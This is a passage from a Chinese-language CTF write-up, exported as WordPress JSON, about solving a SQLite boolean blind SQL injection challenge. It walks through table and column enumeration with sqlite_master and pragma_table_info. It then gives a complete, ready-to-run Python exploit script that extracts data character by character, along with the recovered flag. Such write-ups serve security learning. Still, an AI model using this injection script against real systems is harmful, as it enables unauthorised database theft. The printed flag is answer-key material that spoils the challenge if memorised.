class=\"wp-block-paragraph\">\u4e3a\u4e86\u907f\u514d\u76f4\u63a5\u76f2\u731c\u5217\u540d\uff0c\u53ef\u4ee5\u7ee7\u7eed\u5229\u7528 SQLite \u7684\u5143\u4fe1\u606f\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>select count(*) from pragma_table_info('workspace_secret_notes')<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u53ca\uff1a <code>select name from pragma_table_info('workspace_secret_notes') limit 1 offset n<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\u5b57\u6bb5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    id\n    org_id\n    note_key\n    note_value\n    scope\n    rotated_at<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u65f6\u8868\u7ed3\u6784\u5df2\u7ecf\u5341\u5206\u660e\u663e\uff1a\u8fd9\u662f\u4e00\u4e2a <strong>\u952e\u503c\u914d\u7f6e\u8868<\/strong>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u8fdb\u4e00\u6b65\u8bfb\u53d6 <code>note_key<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    billing_rollout\n    incident_room\n    flag<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u7b2c\u4e09\u4e2a\u952e\u540d\u76f4\u63a5\u53eb <code>flag<\/code> \u65f6\uff0c\u8fd9\u9898\u5df2\u7ecf\u8fdb\u5165\u6536\u5c3e\u9636\u6bb5\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516d-\u63d0\u53d6-flag\">\u516d\u3001\u63d0\u53d6 Flag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u8bfb\u53d6\uff1a select note_value from workspace_secret_notes where note_key=&#8217;flag&#8217; limit 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u540c\u6837\u4f7f\u7528\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>length()<\/code><\/li>\n\n\n\n<li><code>substr()<\/code><\/li>\n\n\n\n<li><code>unicode()<\/code><\/li>\n\n\n\n<li>\u4e8c\u5206\u6cd5<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u9010\u5b57\u7b26\u7206\u7834\u5373\u53ef\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\uff1a <code>FLAG{231f273b-3ba1-4345-ba71-0d500c7749ab}<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e03-\u5b8c\u6574\u5229\u7528\u811a\u672c\">\u4e03\u3001\u5b8c\u6574\u5229\u7528\u811a\u672c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u4e00\u4efd\u5b9e\u9645\u53ef\u7528\u7684 Python \u811a\u672c\u3002\u8fd9\u4e2a\u811a\u672c\u5305\u542b\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8bf7\u6c42\u91cd\u8bd5<\/li>\n\n\n\n<li>\u5e03\u5c14\u5224\u65ad<\/li>\n\n\n\n<li>\u6570\u503c\u4e8c\u5206<\/li>\n\n\n\n<li class=\"has-medium-font-size\">\u6587\u672c\u9010\u5b57\u7b26\u8bfb\u53d6<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>import requests\nimport time\nimport random\nfrom requests.adapters import HTTPAdapter\nfrom urllib3.util.retry import Retry BASE = \"http:\/\/8000-28fa6653-0087-4658-ad50-c79137139ddd.challenge.ctfplus.cn\/api\/invite\/check\" sess = requests.Session()\nretry = Retry(\ntotal=5,\nconnect=5,\nread=5,\nbackoff_factor=0.5,\nstatus_forcelist=&#91;429, 500, 502, 503, 504],\nallowed_methods=None,\n)\nsess.mount(\"http:\/\/\", HTTPAdapter(max_retries=retry)) def req(cond: str) -&gt; bool:\npayload = f\\\"' OR ({cond})-- \\\"\nfor attempt in range(8):\ntry:\nr = sess.get(BASE, params={\"code\": payload}, timeout=(15, 20))\nr.raise_for_status()\nreturn bool(r.json().get(\"valid\"))\nexcept Exception:\nif attempt == 7:\nraise\ntime.sleep(0.35 * (attempt + 1) + random.random() * 0.2) def num_equals(expr: str, n: int) -&gt; bool:\nreturn req(f\"({expr})={n}\") def num_gt(expr: str, n: int) -&gt; bool:\nreturn req(f\"({expr})&gt;{n}\") def find_number(expr: str, lo: int = 0, hi: int = 256):\nwhile lo &lt; hi:\nmid = (lo + hi) \/\/ 2\nif num_gt(expr, mid):\nlo = mid + 1\nelse:\nhi = mid\nif num_equals(expr, lo):\nreturn lo\nreturn None def dump_text(expr: str, max_len: int = 200) -&gt; str:\nln = find_number(f\"length(({expr}))\", 0, max_len)\nif ln is None:\nreturn \"\"\nout = &#91;]\nfor i in range(1, ln + 1):\ncode = find_number(f\"unicode(substr(({expr}),{i},1))\", 0, 126)\nout.append(chr(code if code is not None else 63))\nreturn \"\".join(out) if <strong>name<\/strong> == \"<strong>main<\/strong>\":\ntable_count = find_number(\"select count(*) from sqlite_master where type='table'\", 0, 20)\nprint(\"&#91;+] table_count =\", table_count) <code>for i in range(table_count): name = dump_text( f\"select name from sqlite_master where type='table' order by name limit 1 offset {i}\", 80, ) print(f\"&#91;+] table&#91;{i}] =\", name) col_count = find_number(\"select count(*) from pragma_table_info('workspace_secret_notes')\", 0, 20) print(\"&#91;+] column_count =\", col_count) for i in range(col_count): col = dump_text( f\"select name from pragma_table_info('workspace_secret_notes') limit 1 offset {i}\", 80, ) print(f\"&#91;+] column&#91;{i}] =\", col) for i in range(3): key = dump_text( f\"select note_key from workspace_secret_notes order by id limit 1 offset {i}\", 80, ) print(f\"&#91;+] key&#91;{i}] =\", key) flag = dump_text( \"select note_value from workspace_secret_notes where note_key='flag' limit 1\", 200, ) print(\"&#91;+] FLAG =\", flag)<\/code><\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516b-\u5229\u7528\u903b\u8f91\u56fe\">\u516b\u3001\u5229\u7528\u903b\u8f91\u56fe<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>flowchart TD\n    A&#91;\"\u8bbf\u95ee\u9996\u9875\"] --&gt; B&#91;\"\u67e5\u770b\u524d\u7aef JS\"]\n    B --&gt; C&#91;\"\u53d1\u73b0 \/api\/invite\/check?code=\"]\n    C --&gt; D&#91;\"\u6784\u9020\u771f\u5047 Payload\"]\n    D --&gt; E&#91;\"\u786e\u8ba4 SQLite \u5e03\u5c14\u76f2\u6ce8\"]\n    E --&gt; F&#91;\"\u679a\u4e3e sqlite_master \u8868\u540d\"]\n    F --&gt; G&#91;\"\u5b9a\u4f4d workspace_secret_notes\"]\n    G --&gt; H&#91;\"\u901a\u8fc7 pragma_table_info \u679a\u4e3e\u5b57\u6bb5\"]\n    H --&gt; I&#91;\"\u53d1\u73b0 note_key \/ note_value\"]\n    I --&gt; J&#91;\"\u8bfb\u53d6 note_key\"]\n    J --&gt; K&#91;\"\u53d1\u73b0 key = flag\"]\n    K --&gt; L&#91;\"\u8bfb\u53d6 note_value\"]\n    L --&gt; M&#91;\"\u5f97\u5230\u6700\u7ec8 Flag\"]  <\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e5d-\u9898\u76ee\u4eae\u70b9\">\u4e5d\u3001\u9898\u76ee\u4eae\u70b9<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u7684\u8bbe\u8ba1\u5176\u5b9e\u5f88\u6f02\u4eae\uff0c\u4e3b\u8981\u6f02\u4eae\u5728\u4e09\u4e2a\u5730\u65b9\uff1a<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u56de\u663e\u6781\u5c11-\u4f46\u4fe1\u606f\u8db3\u591f\">1. \u56de\u663e\u6781\u5c11\uff0c\u4f46\u4fe1\u606f\u8db3\u591f<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u9875\u9762\u6ca1\u6709\u62a5\u9519\u3001\u6ca1\u6709\u8be6\u7ec6\u63d0\u793a\u3001\u6ca1\u6709\u76f4\u63a5\u6570\u636e\u8f93\u51fa\uff0c\u53ea\u6709\u4e00\u4e2a\u8f7b\u63cf\u6de1\u5199\u7684 <code>valid=true\/false<\/code>\u3002\u4f46\u5bf9\u4e8e\u76f2\u6ce8\u6765\u8bf4\uff0c\u8fd9\u5df2\u7ecf\u8db3\u591f\u6784\u6210\u4e00\u4e2a\u5b8c\u6574\u7684\u4fe1\u606f\u901a\u9053\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-\u524d\u7aef\u63a5\u53e3\u662f\u552f\u4e00\u5165\u53e3\">2. \u524d\u7aef\u63a5\u53e3\u662f\u552f\u4e00\u5165\u53e3<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u6ca1\u6709\u628a\u6ce8\u5165\u70b9\u5199\u5728\u660e\u9762\u4e0a\uff0c\u800c\u662f\u8981\u6c42\u9009\u624b\u4ece\u524d\u7aef JS \u53bb\u7406\u89e3\u771f\u5b9e\u7684\u6570\u636e\u6d41\u3002\u8fd9\u4e00\u6b65\u5f88\u63a5\u8fd1\u771f\u5b9e\u4e1a\u52a1\u73af\u5883\u4e2d\u7684\u6f0f\u6d1e\u6316\u6398\u65b9\u5f0f\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-sqlite-\u5229\u7528\u94fe\u7d27\u51d1\">3. SQLite \u5229\u7528\u94fe\u7d27\u51d1<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ece <code>sqlite_master<\/code> \u5230 <code>pragma_table_info()<\/code>\uff0c\u518d\u5230 <code>substr()<\/code> \/ <code>length()<\/code> \/ <code>unicode()<\/code>\uff0c\u6574\u4e2a\u5229\u7528\u8fc7\u7a0b\u975e\u5e38\u201cSQLite \u5473\u201d\uff0c\u9002\u5408\u4f5c\u4e3a\u4e00\u9898\u9ad8\u8d28\u91cf\u7684\u6570\u636e\u5e93\u76f2\u6ce8\u7ec3\u4e60\u9898\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341-\u590d\u76d8\u4e0e\u7ecf\u9a8c\">\u5341\u3001\u590d\u76d8\u4e0e\u7ecf\u9a8c<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"\u8fd9\u9898\u6700\u91cd\u8981\u7684\u7ecf\u9a8c\u6709\u4e09\u70b9\">\u8fd9\u9898\u6700\u91cd\u8981\u7684\u7ecf\u9a8c\u6709\u4e09\u70b9<\/h5>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u76f2\u6ce8\u4e0d\u4e00\u5b9a\u9700\u8981\u62a5\u9519\u548c\u5ef6\u65f6<\/strong>\u53ea\u8981\u5e94\u7528\u7ed9\u51fa\u7a33\u5b9a\u7684\u771f\u5047\u5dee\u5f02\uff0c\u5c31\u8db3\u591f\u5b8c\u6210\u5229\u7528\u3002<\/li>\n\n\n\n<li><strong>\u524d\u7aef\u4ee3\u7801\u7ecf\u5e38\u662f\u6700\u597d\u7684\u201c\u63a5\u53e3\u6587\u6863\u201d<\/strong>\u5f88\u591a\u65f6\u5019\u540e\u7aef\u85cf\u5f97\u5f88\u6df1\uff0c\u4f46\u524d\u7aef\u4f1a\u4e3b\u52a8\u628a\u63a5\u53e3\u8def\u5f84\u3001\u53c2\u6570\u540d\u3001\u8fd4\u56de\u7ed3\u6784\u4ea4\u4ee3\u6e05\u695a\u3002<\/li>\n\n\n\n<li><strong>\u9047\u5230 SQLite \u65f6\uff0c\u5148\u60f3\u5230 <code>sqlite_master<\/code><\/strong>\u8fd9\u662f\u6700\u81ea\u7136\u3001\u6700\u9ad8\u6548\u7684\u7a81\u7834\u53e3\u3002<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6700\u7ec8\u7b54\u6848\">\u6700\u7ec8\u7b54\u6848<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{231f273b-3ba1-4345-ba71-0d500c7749ab}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u961f\u540d\uff1a\u7f51\u5b89\u4e0d\u80fd\u5931\u53bb\u4e8c\u680b\uff083\u4e2a25\u5c0f\u767b\u4eec\u7684\u961f\u4f0d\uff09 \u672c\u4eba\u62ff\u4e86\u4e2aMISC\u76841\u4e2a\u4e8c\u8840\uff0c\u4e24\u4e2a\u4e09\u8840\uff0c\u961f\u4f0d\u603b\u6392\u540d\u7b2c\u4e09\u3002\u961f\u53cb\u6253 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1424,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_gspb_post_css":"","footnotes":""},"categories":[9],"tags":[],"class_list":["post-1416","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-misc"],"_links":{"self":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1416","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/comments?post=1416"}],"version-history":[{"count":11,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1416\/revisions"}],"predecessor-version":[{"id":1439,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1416\/revisions\/1439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media\/1424"}],"wp:attachment":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media?parent=1416"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/categories?post=1416"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/tags?post=1416"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}